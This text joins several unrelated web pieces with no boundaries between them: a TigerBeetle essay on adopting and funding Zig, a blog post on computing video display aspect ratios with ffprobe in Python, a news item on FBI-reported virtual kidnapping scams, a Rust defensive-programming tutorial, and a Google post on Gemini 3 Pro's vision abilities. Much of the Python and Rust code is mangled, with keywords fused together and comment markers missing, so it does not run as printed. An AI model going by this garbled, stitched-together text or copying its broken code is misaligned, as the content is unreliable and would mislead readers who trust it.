Andrew Kelley’s design decisions in the language, the standard library
(e.g. the unmanaged hashmap interface) and the cross-compilation
toolchain, even five years ago, was already exceptional.
Andrews’s philosophy resonated with what I wanted to explore in
TigerStyle. No hidden memory allocations. No hidden control flow. No
preprocessor. No macros. And then you get things like comptime, reducing
the grammar and dimensionality of the language, while simultaneously
multiplying its power. The primary benefit of Zig is the favorable ratio
of expressivity to language complexity.
As a replacement for C, Zig fixed not only the small cuts, such as
explicit alignment in the type system for Direct I/O, or safer casts,
but the showstoppers of spatial memory safety through bounds checking,
and, to a lesser degree (but not guarantee), temporal memory safety
through the debug allocator.
Zig also enabled checked arithmetic by default in safe builds, which
is something I believe only Ada and Swift do (remarkably, Rust disables
checked arithmetic by default in safe builds—a default I would love to
see changed). TigerBeetle separates the data plane from the control
plane by design, through batching, so the runtime cost of these safety
checks was not material, being amortized in the data plane across bigger
buffers. While a borrow checker or static allocation can simplify memory
management, getting logic and arithmetic correct remains hard. Of
course, you can enable checked arithmetic in other languages, but I
appreciated Andrew’s concern for checked arithmetic and stricter
operands by default.
In all these things, what impressed me most was Zig’s approach to
safety when working with the metal. Not in terms of an on/off decision,
but as a spectrum. Not aiming for 100% guarantees across 1 or 2
categories, but 90% and then across more categories. Not eliminating
classes of bugs, but downgrading their probability. All while preserving
the power-to-weight ratio of the language, to keep the language
beautifully simple.
Many languages start simple and grow complex as features are added.
Zig’s simplicity is unusual in that it comes from a subtractive
discipline (e.g. no private fields) rather than a deferred complexity;
minimizing surface area is part of the ethos of the language. The
simplicity of Zig meant that we could hire great programmers from any
language background—they could pick up Zig in a weekend. Indeed, I’ve
never had to talk to a new hire about learning Zig.
Finally, there was the timing. Recognizing that TigerBeetle would
take time to reach production (we shipped production in 2024, after 3.5
years of development), giving Zig time to mature, for our trajectories
to intersect.
Investing in creating a database like TigerBeetle is a long term
effort. Databases tend to have a long half life (e.g. Postgres is 30
years old). And so, while Zig being early in 2020 did give me pause,
nevertheless Zig’s quality, philosophy and simplicity made sense for a
multi-decade horizon.
How has the decision for Zig panned out?
TigerBeetle is tested end-to-end under some pretty extreme fuzzing.
We did have three bugs that would have been prevented by the borrow
checker, but these were caught by our fuzzers and online verification.
We run a fuzzing fleet of 1,000 dedicated CPU cores 24/7. We invest in
deterministic simulation testing (e.g.
VOPR
),
as well as non-deterministic fault-injection harnesses (e.g.
Vörtex
).
We engaged Kyle Kingsbury in
one of the longest
Jepsen audits to date
—four times the typical duration. Through all
this, Zig’s quality held up flawlessly.
Zig has also been a huge part of our success as a company.
TigerBeetle is only 5 years old but is already migrating some of the
largest brokerages, exchanges and wealth managements in their respective
jurisdictions. Several of our key enterprise contracts were thanks to
the CTOs and even CEOs of these companies also following Zig and seeing
the quality we wanted to achieve with it. I don’t think we could have
written TigerBeetle
as
it is, in any other language
, at least not to the same tight
tolerances, let alone with the same velocity.
Zig’s language specification will only reach 1.0 when all
experimental areas of the language (e.g. async I/O) are finally done.
For TigerBeetle, we care only about the stable language features we use,
testing our binaries end to end, as we would for any language.
Nevertheless, upgrading to new versions, even with breaking changes, has
only been a pleasure for us as a team. The upgrade work is usually fully
paid for by compilation time reduction. For example, the upgrade from
Zig 0.14.1 to Zig 0.15.2 (with the native x86_64 backend) makes debug
builds 2x faster, and even LLVM release builds become 1.6x faster. With
each release, you can literally feel the sheer amount of effort that the
entire Zig core team put into making Zig the world’s most powerful
programming language—and toolchain.
Back in 2020, from a production perspective, Zig was more or less a
frontend to LLVM, the same compiler used by Rust, Swift and other
languages. However, by not shying away from also investing in its own
independent compiler backends and toolchain, by appreciating the value
of replacing LLVM long term, Zig is becoming well positioned to gain a
low-level precision and compilation speed that generic LLVM won’t always
be able to match.
We want Andrew to take his time, to get these things right for the
long term. Fred Brooks once said that
conceptual
integrity
is “the most important consideration” in system design,
that the design must proceed from one mind.
In this spirit, I am grateful for Andrew’s remarkably strong
leadership (and taste) in the design of the language and toolchain.
There can be thankless pressure on an open source project to give in to
the tragedy of the commons. But if anything, in hindsight I think this
is what I’ve most appreciated about choosing Zig for TigerBeetle, that
Zig has a strong BDFL.
Of course, some may hear “BDFL” and see governance risk. But I fear
the opposite: conceptual risk, the harder problem. Brooks was
right—conceptual integrity is almost certainly doomed by committee.
Whereas governance is easier solved: put it in the hands, not of the
corporates, but of the people. The individuals who choose each day to
continue to donate.
This is why our pledge today, along with all other ZSF donors, is a
simple donation with no strings attached. The Zig Software Foundation is
well managed, transparent and independent. We want it to remain this
way. The last thing we want is some kind of foundation “seat”. Andrew is
Chef. We want to let him cook, and pay his core team sustainably (e.g.
92% percent of
budget goes to directly paying contributors
).
If cooking is one metaphor, then surfing is another. I believe that
technology moves in waves. The art is not in paddling to the wave with a
thousand surfers on it. But in spotting the swell before it breaks. And
then enjoying the ride with the early adopters who did the same.
River
,
Ghostty
,
Bun
,
Mach
and many fellow
surfers.
In fact, it was through Zig that I met
Derek Collison
, who like me had
been sponsoring the language in his personal capacity since 2018. As a
former CTO at VMware, Derek was responsible for backing
antirez
to work full time on Redis. Derek
later went on to create
NATS
, founding
Synadia
.
As we were about to increase TigerBeetle’s yearly donation to Zig, I
reached out to Derek, and we decided to do a joint announcement,
following Mitchell
Hashimoto’s lead
. For each of our companies to donate $256,000 in
monthly installments over the next two years, with Synadia matching
TigerBeetle, for a total of $512,000—the first installment already
made.
Please consider
donating
or
increasing your donation if you can. And if you are a CEO or CTO, please
team up with another company to outmatch us! Thanks Andrew for creating
something special, and to all who code for the joy of the craft:
When I embed videos in web pages, I specify an
aspect ratio
. For example, if my video is 1920 × 1080 pixels, I’d write:
<videostyle="aspect-ratio: 1920 / 1080">
If I also set a width or a height, the browser now knows exactly how much space this video will take up on the page – even if it hasn’t loaded the video file yet. When it initially renders the page, it can leave the right gap, so it doesn’t need to rearrange when the video eventually loads. (The technical term is “reducing
cumulative layout shift
”.)
That’s the idea, anyway.
I noticed that some of my videos weren’t fitting in their allocated boxes. When the video file loaded, it could be too small and get letterboxed, or be too big and force the page to rearrange to fit. Clearly there was a bug in my code for computing aspect ratios, but what?
Three aspect ratios, one video
I opened one of the problematic videos in QuickTime Player, and the resolution listed in the Movie Inspector was rather curious:
Resolution: 1920 × 1080 (1350 × 1080)
.
The first resolution is what my code was reporting, but the second resolution is what I actually saw when I played the video. Why are there two?
The
storage aspect ratio (SAR)
of a video is the pixel resolution of a raw frame. If you extract a single frame as a still image, that’s the size of the image you’d get. This is the first resolution shown by QuickTime Player, and it’s what I was reading in my code.
I was missing a key value – the
pixel aspect ratio (PAR)
. This describes the shape of each pixel, in particular the width-to-height ratio. It tells a video player how to stretch or squash the stored pixels when it displays them. This can sometimes cause square pixels in the stored image to appear as rectangles.
PAR < 1
portrait pixels
PAR = 1
square pixels
PAR > 1
landscape pixels
This reminds me of
EXIF orientation
for still images – a transformation that the viewer applies to the stored data. If you don’t apply this transformation properly, your media will look wrong when you view it. I wasn’t accounting for the pixel aspect ratio in my code.
According to Google, the primary use case for non-square pixels is standard-definition televisions which predate digital video. However, I’ve encountered several videos with an unusual PAR that were made long into the era of digital video, when that seems unlikely to be a consideration. It’s especially common in vertical videos like YouTube Shorts, where the stored resolution is a square 1080 × 1080, and the aspect ratio makes it a portrait.
I wonder if it’s being introduced by a processing step somewhere? I don’t understand why, but I don’t have to – I’m only displaying videos, not producing them.
The
display aspect ratio (DAR)
is the size of the video as viewed – what happens when you apply the pixel aspect ratio to the stored frames. This is the second resolution shown by QuickTime Player, and it’s the aspect ratio I should be using to preallocate space in my video player.
These three values are linked by a simple formula:
DAR = SAR × PAR
The size of the viewed video is the stored resolution times the shape of each pixel.
The stored frame may not be what you see
One video with a non-unit pixel aspect ratio is my download of
Mars EDL 2020 Remastered
. This video by Simeon Schmauß tries to match what the human eye would have seen during the landing of NASA’s
Perseverance
rover
in 2021.
We can get the width, height, and
sample aspect ratio
(which is another name for pixel aspect ratio) using ffprobe:
Here
1920
is the stored width, and
45:64
is the pixel aspect ratio. We can multiply them together to get the display width:
1920 × 45 / 64 = 1350
. This matches what I saw in QuickTime Player.
Let’s extract a single frame using
ffmpeg
, to get the stored pixels. This command saves the 5000th frame as a PNG image:
The image is 1920 × 1080 pixels, and it looks wrong: the circular parachute is visibly stretched.
Suppose we take that same image, but now apply the pixel aspect ratio. This is what the image is meant to look like, and it’s not a small difference – now the parachute actually looks like a circle.
Seeing both versions side-by-side makes the problem obvious: the stored frame isn’t how the video is displayed. The video player in my browser will play it correctly using the pixel aspect ratio, but my layout code wasn’t doing that. I was telling the browser the wrong aspect ratio, and the browser had to update the page when it loaded the video file.
Getting the correct display dimensions in Python
This is my old function for getting the dimensions of a video file, which uses a
Python wrapper around MediaInfo
to extract the width and height fields. I now realise that this only gives me the storage aspect ratio, and may be misleading for some videos.
from pathlib import Path
from pymediainfo import MediaInfo
def get_storage_aspect_ratio(video_path: Path) -> tuple[int, int]:"""
Returns the storage aspect ratio of a video, as a width/height ratio.
"""media_info = MediaInfo.parse(video_path)
try:video_track = next(
tr
for tr in media_info.tracks
if tr.track_type == "Video")
except StopIteration:
raise ValueError(f"No video track found in {video_path}")
return video_track.width, video_track.height
I can’t find an easy way to extract the pixel aspect ratio using pymediainfo. It does expose a
Track.aspect_ratio
property, but that’s a string which has a rounded value – for example,
45:64
becomes
0.703
. That’s close, but the rounding introduces a small inaccuracy. Since I can get the complete value from ffprobe, that’s what I’m doing in my revised function.
The new function is longer, but it’s more accurate:
from fractions import Fraction
import json
from pathlib import Path
import subprocess
def get_display_aspect_ratio(video_path: Path) -> tuple[int, int]:"""
Returns the display aspect ratio of a video, as a width/height fraction.
"""cmd = ["ffprobe",#
# verbosity level = error
"-v","error",#
# only get information about the first video stream
"-select_streams","v:0",#
# only gather the entries I'm interested in
"-show_entries","stream=width,height,sample_aspect_ratio",#
# print output in JSON, which is easier to parse
"-print_format","json",#
# input file
str(video_path)]output = subprocess.check_output(cmd)ffprobe_resp = json.loads(output)# The output will be structured something like:
#
# {
# "streams": [
# {
# "width": 1920,
# "height": 1080,
# "sample_aspect_ratio": "45:64"
# }
# ],
# …
# }
#
# If the video doesn't specify a pixel aspect ratio, then it won't
# have a `sample_aspect_ratio` key.
video_stream = ffprobe_resp["streams"][0]
try:pixel_aspect_ratio = Fraction(
video_stream["sample_aspect_ratio"].replace(":","/"))
except KeyError:pixel_aspect_ratio = 1width = round(video_stream["width"] * pixel_aspect_ratio)height = video_stream["height"]
return width, height
This is calling the
ffprobe
command I showed above, plus
-print_format json
to print the data in JSON, which is easier for Python to parse.
I have to account for the case where a video doesn’t set a sample aspect ratio – in that case, the displayed video just uses square pixels.
Since the aspect ratio is expressed as a ratio of two integers, this felt like a good chance to try the
fractions
module
. That avoids converting the ratio to a floating-point number, which potentially introduces inaccuracies. It doesn’t make a big difference, but in my video collection treating the aspect ratio as a
float
produces results that are 1 or 2 pixels different from QuickTime Player.
When I multiply the stored width and aspect ratio, I’m using the
round()
function
to round the final width to the nearest integer. That’s more accurate than
int()
, which always rounds down.
Conclusion: use display aspect ratio
When you want to know how much space a video will take up on a web page, look at the display aspect ratio, not the stored pixel dimensions. Pixels can be squashed or stretched before display, and the stored width/height won’t tell you that.
Videos with non-square pixels are pretty rare, which is why I ignored this for so long. I’m glad I finally understand what’s going on.
After switching to ffprobe and using the display aspect ratio, my pre-allocated video boxes now match what the browser eventually renders – no more letterboxing, no more layout jumps.
FBI warns of virtual kidnapping scams using altered social media photos
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 16:37:28
The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams. [...]...
The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams.
This is part of a public service announcement published today about criminals contacting victims via text message, claiming to have kidnapped a family member and demanding ransom payments.
However, as the FBI explained, virtual kidnapping scams involve no actual abduction. Instead, criminals use manipulated images found on social networks and publicly available information to create convincing scenarios designed to pressure victims into paying ransoms before verifying that their loved ones are safe.
"Criminal actors typically will contact their victims through text message claiming they have kidnapped their loved one and demand a ransom be paid for their release," the
FBI said
on Friday.
"Oftentimes, the criminal actor will express significant claims of violence towards the loved one if the ransom is not paid immediately. The criminal actor will then send what appears to be a genuine photo or video of the victim's loved one, which upon close inspection often reveals inaccuracies when compared to confirmed photos of the loved one."
The law enforcement agency advised the public to be cautious of scammers who often create a false sense of urgency and to carefully assess the validity of the kidnappers' claims.
To defend against such scams, the FBI recommends taking several protective measures, such as avoiding providing personal information to strangers while traveling and establishing a code word known only to the family to verify communications during emergencies.
Additionally, when sharing information about missing persons online, one should remain vigilant, as scammers might reach out with false information.
The FBI also recommends taking screenshots or recording proof-of-life photos whenever possible for later analysis during investigations, since scammers sometimes deliberately send these photos using timed message features to limit the time victims have to analyze the images.
While the FBI didn't share how many complaints regarding these virtual kidnapping scams have been filed with its Internet Crime Complaint Center or how widespread this type of fraud is at the moment, BleepingComputer has
found
multiple
instances
of people targeted by similar scams that
spoofed their loved ones' phone numbers
.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Whenever I see the comment
// this should never happen
in code, I try to find out the exact conditions under which
it could
happen.
And in 90% of cases, I find a way to do just that.
More often than not, the developer just hasn’t considered all edge cases or future code changes.
In fact, the reason why I like this comment so much is that it often
marks the exact spot
where strong guarantees fall apart.
Often, violating implicit invariants that aren’t enforced by the compiler are the root cause.
Yes, the compiler prevents memory safety issues, and the standard library is best-in-class.
But even the standard library
has its warts
and bugs in business logic can still happen.
All we can work with are hard-learned patterns to write more defensive Rust code, learned throughout years of shipping Rust code to production.
I’m not talking about design patterns here, but rather small idioms, which are rarely documented, but make a big difference in the overall code quality.
What if you refactor it and forget to keep the
is_empty()
check?
The problem is that the vector indexing is decoupled from checking the length.
So
matching_users[0]
can panic at runtime if the vector is empty.
Checking the length and indexing are two separate operations, which can be changed independently.
That’s our first implicit invariant that’s not enforced by the compiler.
If we use slice pattern matching instead, we’ll only get access to the element if the correct
match
arm is executed.
match matching_users.as_slice(){[]=>todo!("What to do if no users found!?"),[existing_user]=>{ Safe! Compiler guarantees exactly one element
No need to index into the vector,
we can directly use `existing_user` here
}_=>Err(RepositoryError::DuplicateUsers)}
Note how this automatically uncovered one more edge case: what if the list is empty?
We hadn’t explicitly considered this case before.
The compiler-enforced pattern matching requires us to think about all possible states!
This is a common pattern in all robust Rust code: putting the compiler in charge of enforcing invariants.
When initializing an object with many fields, it’s tempting to use
..Default::default()
to fill in the rest.
In practice, this is a common source of bugs.
You might forget to explicitly set a new field later when you add it to the struct (thus using the default value instead, which might not be what you want), or you might not be aware of all the fields that are being set to default values.
Instead of this:
let foo = Foo { field1: value1, field2: value2,..Default::default()// Implicitly sets all other fields
};
Do this:
let foo = Foo { field1: value1, field2: value2, field3: value3,// Explicitly set all fields
field4: value4,// ...
};
Yes, it’s slightly more verbose, but what you gain is that the compiler will force you to handle all fields explicitly.
Now when you add a new field to
Foo
, the compiler will remind you to set it here as well and reflect on which value makes sense.
If you still prefer to use
Default
but don’t want to lose compiler checks, you can also destructure the default instance:
let Foo { field1, field2, field3, field4 }=Foo::default();
This way, you get all the default values assigned to local variables and you can still override what you need:
let foo = Foo { field1: value1,// Override what you need
field2: value2,// Override what you need
field3,// Use default value
field4,// Use default value
};
This pattern gives you the best of both worlds:
You get default values without duplicating default logic
The compiler will complain when new fields are added to the struct
Your code automatically adapts when default values change
It’s clear which fields use defaults and which have custom values
Completely destructuring a struct into its components can also be a defensive strategy for API adherence.
For example, let’s say you’re building a pizza ordering system and have an order type like this:
For your order tracking system, you want to compare orders based on what’s actually on the pizza - the
size
,
toppings
, and
crust_type
. The
ordered_at
timestamp shouldn’t affect whether two orders are considered the same.
Now imagine your team adds a field for customization options:
structPizzaOrder{size: PizzaSize,
toppings:Vec<Topping>,
crust_type: CrustType,
ordered_at: SystemTime,
extra_cheese:bool, New field added
}
Your
PartialEq
implementation still compiles, but is it correct?
Should
extra_cheese
be part of the equality check?
Probably yes - a pizza with extra cheese is a different order!
But you’ll never know because the compiler won’t remind you to think about it.
Here’s the defensive approach using destructuring:
Now when someone adds the
extra_cheese
field, this code won’t compile anymore.
The compiler forces you to decide: should
extra_cheese
be included in the comparison or explicitly ignored with
extra_cheese: _
?
This pattern works for any trait implementation where you need to handle struct fields:
Hash
,
Debug
,
Clone
, etc.
It’s especially valuable in codebases where structs evolve frequently as requirements change.
Sometimes there’s no conversion that will work 100% of the time.
That’s fine.
When that’s the case, resist the temptation to offer a
From
implementation out of habit; use
TryFrom
instead.
The
unwrap_or_else
is a hint that this conversion can fail in some way.
We set a default value instead, but is it really the right thing to do for all callers?
This should be a
TryFrom
implementation instead, making the fallible nature explicit.
We fail fast instead of continuing with a potentially flawed business logic.
It’s tempting to use
match
in combination with a catch-all pattern like
_ => {}
, but this can haunt you later.
The problem is that you might forget to handle a new case that was added later.
By spelling out all variants explicitly, the compiler will warn you when a new variant is added, forcing you to handle it.
Another case of putting the compiler to work.
If the code for two variants is the same, you can group them:
Using
_
as a placeholder for unused variables can lead to confusion.
For example, you might get confused about which variable was skipped.
That’s especially true for boolean flags:
matchself{Self::Rocket {_,_,..}=>{ ... }}
In the above example, it’s not clear which variables were skipped and why.
Better to use descriptive names for the variables that are not used:
If you only want your data to be mutable temporarily, make that explicit.
letmut data =get_vec();data.sort();let data = data;// Shadow to make immutable
// Here `data` is immutable.
This pattern is often called “temporary mutability” and helps prevent accidental modifications after initialization.
See the
Rust unofficial patterns book
for more details.
You can go one step further and do the initialization part in a scope block:
let data ={letmut data =get_vec(); data.sort(); data // Return the final value
};// Here `data` is immutable
This way, the mutable variable is confined to the inner scope, making it clear that it’s only used for initialization.
In case you use any temporary variables during initialization, they won’t leak into the outer scope.
In our case above, there were none, but imagine if we had a temporary vector to hold intermediate results:
let data ={letmut data =get_vec();let temp =compute_something(); data.extend(temp); data.sort(); data // Return the final value
};
Here,
temp
is only accessible within the inner scope, which prevents it from accidental use later on.
This is especially useful when you have multiple temporary variables during initialization that you don’t want accessible in the rest of the function.
The scope makes it crystal clear that these variables are only meant for initialization.
The following pattern is only truly helpful for libraries and APIs that need to be robust against future changes.
In such a case, you want to ensure that all instances of a type are created through a constructor function that enforces validation logic.
Because without that, future refactorings can easily lead to invalid states.
For application code, it’s probably best to keep things simple.
You typically have all the call sites under control and can ensure that validation logic is always called.
Let’s say you have a simple type like the following:
pubstructS{pubfield1: String,
pubfield2:u32,
}
Now you want to add validation logic to ensure invalid states are never created.
One pattern is to return a
Result
from the constructor:
implS{pubfnnew(field1: String, field2:u32)->Result<Self, String>{if field1.is_empty(){returnErr("field1 cannot be empty".to_string());}if field2 ==0{returnErr("field2 cannot be zero".to_string());}Ok(Self{ field1, field2 })}}
But nothing stops someone from bypassing your validation by creating an instance directly:
let s = S { field1:"".to_string(), field2:0,};
This should not be possible!
It is our implicit invariant that’s not enforced by the compiler: the validation logic is decoupled from struct construction.
These are two separate operations, which can be changed independently and the compiler won’t complain.
To force
external code
to go through your constructor, add a private field:
pubstructS{pubfield1: String,
pubfield2:u32,
_private:(), This prevents external construction
}implS{pubfnnew(field1: String, field2:u32)->Result<Self, String>{if field1.is_empty(){returnErr("field1 cannot be empty".to_string());}if field2 ==0{returnErr("field2 cannot be zero".to_string());}Ok(Self{ field1, field2, _private:()})}}
Now code outside your module cannot construct
S
directly because it cannot access the
_private
field.
The compiler enforces that all construction must go through your
new()
method, which includes your validation logic!
Note that the underscore prefix is just a
naming convention
to indicate the field is intentionally unused; it’s the lack of
pub
that makes it private and prevents external construction.
For libraries that need to evolve over time, you can also use the
#[non_exhaustive]
attribute instead:
This has the same effect of preventing construction outside your crate, but also signals to users that you might add more fields in the future.
The compiler will prevent them from using struct literal syntax, forcing them to use your constructor.
There’s a big difference between these two approaches:
#[non_exhaustive]
only works across crate boundaries.
It prevents construction outside your crate.
_private
works at the module boundary.
It prevents construction outside the module
, but within the same crate.
On top of that, some developers find
_private: ()
more explicit about intent: “this struct has a private field that prevents construction.”
With
#[non_exhaustive]
, the primary intent is signaling that fields might be added in the future, and preventing construction is more of a side effect.
But what about code within the
same module
?
With the patterns above, code in the same module can still bypass your validation:
// Still compiles in the same module!
let s = S { field1:"".to_string(), field2:0, _private:(),};
Rust’s privacy works at the module level, not the type level.
Anything in the same module can access private items.
If you need to enforce constructor usage even within your own module, you need a more defensive approach using nested private modules:
modinner{pubstructS{pubfield1: String,
pubfield2:u32,
_seal: Seal,
} This type is private to the inner module
structSeal;implS{pubfnnew(field1: String, field2:u32)->Result<Self, String>{if field1.is_empty(){returnErr("field1 cannot be empty".to_string());}if field2 ==0{returnErr("field2 cannot be zero".to_string());}Ok(Self{ field1, field2, _seal: Seal })}}}// Re-export for public use
pubuseinner::S;
Now even code in your outer module cannot construct
S
directly because
Seal
is trapped in the private
inner
module.
Only the
new()
method, which lives in the same module as
Seal
, can construct it.
The compiler guarantees that all construction, even internal construction, goes through your validation logic.
You could still access the public fields directly, though.
let s =S::new("valid".to_string(),42).unwrap();s.field1 ="".to_string();// Still possible to mutate fields directly
To prevent that, you can make the fields private and provide getter methods instead:
modinner{pubstructS{field1: String,
field2:u32,
_seal: Seal,
}structSeal;implS{pubfnnew(field1: String, field2:u32)->Result<Self, String>{if field1.is_empty(){returnErr("field1 cannot be empty".to_string());}if field2 ==0{returnErr("field2 cannot be zero".to_string());}Ok(Self{ field1, field2, _seal: Seal })}pubfnfield1(&self)->&str{&self.field1
}pubfnfield2(&self)->u32{self.field2
}}}
Now the only way to create an instance of
S
is through the
new()
method, and the only way to access its fields is through the getter methods.
For external code
: Add a private field like
_private: ()
or use
#[non_exhaustive]
For internal code
: Use nested private modules with a private “seal” type
Choose based on your needs
: Most code only needs to prevent external construction; forcing internal construction is more defensive but also more complex
The key insight is that by making construction impossible without access to a private type, you turn your validation logic from a convention into a guarantee enforced by the compiler.
So let’s put that compiler to work!
The
#[must_use]
attribute is often neglected.
That’s sad, because it’s such a simple yet powerful mechanism to prevent callers from accidentally ignoring important return values.
#[must_use="Configuration must be applied to take effect"]pubstructConfig{ ...
}implConfig{pubfnnew()->Self{}pubfnwith_timeout(mutself, timeout: Duration)->Self{self.timeout = timeout;self}}
Now if someone creates a
Config
but forgets to use it, the compiler will warn them
(even with a custom message!):
let config =Config::new();// Warning: Configuration must be applied to take effect
config.with_timeout(Duration::from_secs(30));// Correct usage:
let config =Config::new().with_timeout(Duration::from_secs(30));apply_config(config);
This is especially useful for guard types that need to be held for their lifetime and results from operations that must be checked.
The standard library uses this extensively.
For example,
Result
is marked with
#[must_use]
, which is why you get warnings if you don’t handle errors.
Boolean parameters make code hard to read at the call site and are error-prone.
We all know the scenario where we’re sure this will be the last boolean parameter we’ll ever add to a function.
// Too many boolean parameters
fnprocess_data(data:&[u8], compress:bool, encrypt:bool, validate:bool){ ...
}// At the call site, what do these booleans mean?
process_data(&data,true,false,true);// What does this do?
It’s impossible to understand what this code does without looking at the function signature.
Even worse, it’s easy to accidentally swap the boolean values.
Instead, use enums to make the intent explicit:
enumCompression{ Strong, Medium,None,}enumEncryption{AES, ChaCha20,None,}enumValidation{ Enabled, Disabled,}fnprocess_data(data:&[u8],
compression: Compression,
encryption: Encryption,
validation: Validation,
){ ...
}// Now the call site is self-documenting
process_data(&data,Compression::Strong,Encryption::None,Validation::Enabled
);
This is much more readable and the compiler will catch mistakes if you pass the wrong enum type.
You will notice that the enum variants can be more descriptive than just
true
or
false
.
And more often than not, there are more than two meaningful options; especially for programs which grow over time.
For functions with many options, you can configure them using a parameter struct:
structProcessDataParams{compression: Compression,
encryption: Encryption,
validation: Validation,
}implProcessDataParams{ Common configurations as constructor methods
pubfnproduction()->Self{Self{ compression:Compression::Strong, encryption:Encryption::AES, validation:Validation::Enabled,}}pubfndevelopment()->Self{Self{ compression:Compression::None, encryption:Encryption::None, validation:Validation::Enabled,}}}fnprocess_data(data:&[u8], params: ProcessDataParams){ ...
}// Usage with preset configurations
process_data(&data,ProcessDataParams::production());// Or customize for specific needs
process_data(&data, ProcessDataParams { compression:Compression::Medium, encryption:Encryption::ChaCha20, validation:Validation::Enabled,});
This approach scales much better as your function evolves.
Adding new parameters doesn’t break existing call sites, and you can easily add defaults or make certain fields optional.
The preset methods also document common use cases and make it easy to use the right configuration for different scenarios.
Rust is often criticized for not having named parameters, but using a parameter struct is arguably even better for larger functions with many options.
Defensive programming in Rust is about leveraging the type system and compiler to catch bugs before they happen.
By following these patterns, you can:
Make implicit invariants explicit and compiler-checked
Future-proof your code against refactoring mistakes
Reduce the surface area for bugs
It’s a skill that doesn’t come naturally and it’s not covered in most Rust books, but knowing these patterns can make the difference between code that works but is brittle, and code that is robust and maintainable for years to come.
Remember: if you find yourself writing
// this should never happen
, take a step back and ask how the compiler could enforce that invariant for you instead.
The best bug is the one that never compiles in the first place.
Zellij: A terminal workspace with batteries included
Gemini 3 Pro delivers state-of-the-art performance across document, spatial, screen and video understanding.
General summary
Gemini 3 Pro is Google's most capable multimodal model that delivers state-of-the-art performance across document, spatial, screen and video understanding. You can use it for complex visual reasoning, document processing, and understanding spatial relationships. Check out the developer documentation or play with the model in Google AI Studio to get started.
Summaries were generated by Google AI. Generative AI is experimental.
Listen to article
This content is generated by Google AI. Generative AI is experimental
[[duration]] minutes
Gemini 3 Pro represents a generational leap from simple recognition to true visual and spatial reasoning. It is our most capable multimodal model ever, delivering state-of-the-art performance across document, spatial, screen and video understanding.
This model sets new highs on vision benchmarks such as MMMU Pro and Video MMMU for complex visual reasoning, as well as use-case-specific benchmarks across document, spatial, screen and long video understanding.
1. Document understanding
Real-world documents are messy, unstructured, and difficult to parse — often filled with interleaved images, illegible handwritten text, nested tables, complex mathematical notation and non-linear layouts. Gemini 3 Pro represents a major leap forward in this domain, excelling across the entire document processing pipeline — from highly accurate Optical Character Recognition (OCR) to complex visual reasoning.
Intelligent perception
To truly understand a document, a model must accurately detect and recognize text, tables, math formulas, figures and charts regardless of noise or format.
A fundamental capability is "derendering" — the ability to reverse-engineer a visual document back into structured code (HTML, LaTeX, Markdown) that would recreate it. As illustrated below, Gemini 3 demonstrates accurate perception across diverse modalities including converting an 18th-century merchant log into a complex table, or transforming a raw image with mathematical annotation into precise LaTeX code.
Example 1: Handwritten Complex Table from 18th century Albany Merchant’s Handbook (
HTML transcription
)
Example 2: Reconstructing equations from an image
Example 3: Reconstructing Florence Nightingale's original Polar Area Diagram into an interactive chart (with a toggle!)
Sophisticated reasoning
Users can rely on Gemini 3 to perform complex, multi-step reasoning across tables and charts — even in long reports. In fact, the model notably outperforms the human baseline on the CharXiv Reasoning benchmark (80.5%).
To illustrate this, imagine a user analyzing the 62-page U.S. Census Bureau "
Income in the United States: 2022
" report with the following prompt: “Compare the 2021–2022 percent change in the Gini index for "Money Income" versus "Post-Tax Income", and what caused the divergence in the post-tax measure, and in terms of "Money Income", does it show the lowest quintile's share rising or falling?”
Swipe through the images below to see the model's step-by-step reasoning.
Visual Extraction: To answer the Gini Index Comparison question, Gemini located and cross-referenced this info in Figure 3 about “Money Income decreased by 1.2 percent” and in Table B-3 about “Post-Tax Income increased by 3.2 percent”
Causal Logic: Crucially, Gemini 3 does not stop at the numbers; it correlates this gap with the text’s policy analysis, correctly identifying Lapse of ARPA Policies and the end of Stimulus Payments are the main causes.
Numerical Comparison: To compare the lowest quantile’s share rising or falling, Gemini3 looked at table A-3, and compared the number of 2.9 and 3.0, and concluded that “the share of aggregate household income held by the lowest quintile was rising.”
2. Spatial understanding
Gemini 3 Pro is our strongest spatial understanding model so far. Combined with its strong reasoning, this enables the model to make sense of the physical world.
Pointing capability:
Gemini 3 has the ability to point at specific locations in images by outputting pixel-precise coordinates. Sequences of 2D points can be strung together to perform complex tasks, such as estimating human poses or reflecting trajectories over time.
Open vocabulary references:
Gemini 3 identifies objects and their intent using an open vocabulary. The most direct application is robotics: the user can ask a robot to generate spatially grounded plans like, “Given this messy table, come up with a plan on how to sort the trash.” This also extends to AR/XR devices, where the user can request an AI assistant to “Point to the screw according to the user manual.”
3. Screen understanding
Gemini 3.0 Pro’s spatial understanding really shines through its screen understanding of desktop and mobile OS screens. This reliability helps make computer use agents robust enough to automate repetitive tasks. UI understanding capabilities can also enable tasks like QA testing, user onboarding and UX analytics. The following computer use demo shows the model perceiving and clicking with high precision.
4. Video understanding
Gemini 3 Pro takes a massive leap forward in how AI understands video, the most complex data format we interact with. It is dense, dynamic, multimodal and rich with context.
High frame rate understanding:
We have optimized the model to be much stronger at understanding fast-paced actions when sampling at >1 frames-per-second. Gemini 3 Pro can capture rapid details — vital for tasks like analyzing golf swing mechanics.
By processing video at 10 FPS—10x the default speed—Gemini 3 Pro catches every swing and shift in weight, unlocking deep insights into player mechanics.
2. Video reasoning with “thinking” mode:
We upgraded "thinking" mode to go beyond object recognition toward true video reasoning. The model can now better trace complex cause-and-effect relationships over time. Instead of just identifying
what
is happening, it understands
why
it is happening.
3. Turning long videos into action:
Gemini 3 Pro bridges the gap between video and code. It can extract knowledge from long-form content and immediately translate it into functioning apps or structured code.
5. Real-world applications
Here are a few ways we think various fields will benefit from Gemini 3’s capabilities.
Education
Gemini 3.0 Pro’s enhanced vision capabilities drive significant gains in the education field, particularly for diagram-heavy questions central to math and science. It successfully tackles the full spectrum of multimodal reasoning problems found from middle school through post-secondary curriculums. This includes visual reasoning puzzles (like
Math Kangaroo
) and complex chemistry and physics diagrams.
Gemini 3’s visual intelligence also powers the generative capabilities of
Nano Banana Pro
. By combining advanced reasoning with precise generation, the model, for example, can help users identify exactly where they went wrong in a homework problem.
